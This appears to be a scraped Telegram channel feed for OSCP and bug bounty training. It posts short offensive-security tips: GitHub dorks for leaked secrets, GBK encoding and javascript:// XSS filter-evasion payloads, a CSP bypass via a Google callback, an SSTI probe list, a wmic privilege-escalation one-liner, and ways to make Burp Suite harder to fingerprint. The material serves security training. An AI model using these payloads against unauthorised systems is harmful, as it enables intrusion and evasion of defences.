πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
@OSCP_training
8.1K subscribers
161 photos
1 video
27 files
64 links
Offensive Security Certified Professional
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
About
Blog
Apps
Platform
Join
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
8.1K subscribers
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
πŸ‘18πŸ”₯7
14.2K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Github Dorks Cheatsheet

Find files with sensitive info, API Keys, Tokens and Passwords.

+ list of github dorks automation tools
πŸ‘14❀4πŸ€”3πŸ‘Ž1
24K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
❀4πŸ‘3
18.1K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
https://twitter.com/intigriti/status/1646104705561403398?t=4R1LPKlBM4bEvhM6pmiPsQ&s=19
X (formerly Twitter)
Intigriti (@intigriti) on X
5 CSRF exploitation techniques πŸ§΅πŸ‘‡
πŸ‘7❀1πŸ”₯1
23K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Windows useful Directories
❀35πŸ‘15
15.7K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Chrome has just unleashed popovers: modal dialogs without JS! Of course you can abuse them for XSS filter evasion
❀13πŸ”₯5πŸ‘1
19K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
https://www.crackcodes.in/2023/06/top-10-burpsuite-extensions-you-must.html
πŸ‘7πŸ‘3
12.6K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
SSRF Techniques Roadmap
❀13πŸ‘2
18.9K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
https://portswigger.net/daily-swig/symfony-based-websites-open-to-rce-attack-research-finds
The Daily Swig | Cybersecurity news and views
Symfony-based websites open to RCE attack, research finds
Researcher’s methods rely on misconfigured servers – but these are easy to find
πŸ‘7πŸ‘Ž2πŸ€”1
8.65K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Burp Suite 2023.8+ includes a feature that theoretically makes opening untrusted project files safe. If you find a bypass, you're probably eligible for a bounty - check the full details here:

https://portswigger.net/burp/releases/professional-community-2023-8
Burp Suite Release Notes
Professional / Community 2023.8
This release introduces the ability to reuse HTTP/1 connections in Intruder, specify intermediate CA certificates when authenticating using hardware tokens and smart cards, safely open third-party pro
πŸ‘10
8.21K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Periodical reminder: it's possible to navigate sub-tabs (like Repeater entries) from the keyboard.

You simply have to configure the actions "Go to previous tab" and "Go to next tab".

Burp Suite
7.72K viewsedited  
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
As Burp Suite is developed in Java, regexes may use embedded flag expressions like "(?m)"

Here's a detailled description of all the possibilities (including embedded flags, character classes, quantifiers, groups, ...)
πŸ‘7❀2πŸŽ‰1
7.57K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Bug Bounty Tip

GBK Encoding / MultiByte Attack

嘊 = %E5%98%8A = \u560a β‡’ %0A
嘍 = %E5%98%8D = \u560d β‡’ %0D
嘾 = %E5%98%BE = \u563e β‡’ %3E (>)
嘼 = %E5%98%BC = \u563c β‡’ %3C (<)
嘒 = %E5%98%A2 = \u5622 β‡’ %22 (')
嘧 = %E5%98%A7 = \u5627 β‡’ %27 (")

For XSS, CRLF, WAF bypass
❀6πŸ‘3
8.74K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
πŸ‘2
8.89K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
πŸ‘15❀8πŸ‘2
8.7K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
CSP Protection Bypass (using Google domain)

/o/oauth2/revoke?callback=alert(1);console.log
❀9πŸ”₯1
8.49K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Useful for local privesc on Windows systems; find unquoted service path using the following: 

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

#OSCP #Windows
πŸ‘12
7.84K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation


Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
portswigger.net
TLS settings - PortSwigger
The TLS settings enable you to configure: TLS negotiation. Client TLS certificates. Server TLS certificates. Java TLS settings. TLS negotiation These ...
πŸ‘3
9.18K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Bug Bounty Tip

SSTI (Server Side Template Injection) Payload List

πŸ”Ή{7*7}
πŸ”Ή*{7*7}
πŸ”Ή{{7*7}}
πŸ”Ή[[7*7]]
πŸ”Ή${7*7}
πŸ”Ή@(7*7)
πŸ”Ή<?=7*7?>
πŸ”Ή<%= 7*7 %>
πŸ”Ή${= 7*7}
πŸ”Ή{{= 7*7}}
πŸ”Ή${{7*7}}
πŸ”Ή#{7*7}
πŸ”Ή[=7*7]

If evaluated as 49 - the target is vulnerable
πŸ‘11
9.87K views
πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
Bug Bounty Tip

When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com

Then, use these symbols
to craft an XSS payload
πŸ”Ή%0a
πŸ”Ή%0d
πŸ”Ή%E2%80%A8
πŸ”Ή%E2%80%A9

βœ… javascript://test.com%0aalert(1)
πŸ‘13❀1
10.1K views